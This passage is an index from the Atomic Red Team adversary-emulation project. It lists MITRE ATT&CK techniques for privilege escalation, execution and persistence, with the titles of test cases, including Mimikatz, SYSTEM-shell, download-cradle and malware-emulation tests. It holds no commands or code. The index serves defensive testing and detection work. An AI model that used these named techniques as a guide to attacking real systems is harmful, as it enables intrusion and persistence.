- Atomic Test #2: Activate Guest Account [windows]
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistence with Event Monitor - emond [macos]
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistence via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- Atomic Test #17: Modify BootExecute Value [windows]
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- Atomic Test #4: Snake Malware Kernel Driver Comadmin [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Append to the system shell profile [linux]
- Atomic Test #4: Append commands user shell profile [linux]
- Atomic Test #5: System shell profile scripts [linux]
- Atomic Test #6: Create/Append to .bash_logout [linux]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service, Modify and Reload the service [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# execution
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
- Atomic Test #9: WMI Execute rundll32 [windows]
- Atomic Test #10: Application uninstall using WMIC [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.007 Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md)
- Atomic Test #1: JScript execution to gather local computer information via cscript [windows]
- Atomic Test #2: JScript execution to gather local computer information via wscript [windows]
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1559.002 Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- [T1204.002 User Execution: Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
- Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
- Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
- T1155 AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [containers]
- Atomic Test #2: Docker Exec Into Container [containers]
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.001 System Services: Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559.003 XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- [T1059.001 Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
- Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
- Atomic Test #4: Obfuscation Tests [windows]
- Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #6: Invoke-AppPathBypass [windows]
- Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
- Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- Atomic Test #22: Abuse Nslookup with DNS Records [windows]
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- Atomic Test #5: New script file in the tmp directory [linux]
- Atomic Test #6: What shell is running [linux]
- Atomic Test #7: What shells are available [linux]
- Atomic Test #8: Command line scripts [linux]
- Atomic Test #9: Obfuscated command line scripts [linux]
- Atomic Test #10: Change login shell [linux]
- Atomic Test #11: Environment variable scripts [linux]
- Atomic Test #12: Detecting pipe-to-shell [linux]
- [T1559 Inter-Process Communication](../../T1559/T1559.md)
- Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
- Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
- Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
- Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
- Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
- [T1204.003 User Execution: Malicious Image](../../T1204.003/T1204.003.md)
- Atomic Test #1: Malicious Execution from Mounted ISO Image [windows]
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode argument [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
- Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
- Atomic Test #5: Command Prompt read contents from CMD file and execute [windows]
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.005 Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1173 Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- Atomic Test #3: psexec.py (Impacket) [linux]
- Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
- Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
- Atomic Test #6: Snake Malware Service Create [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
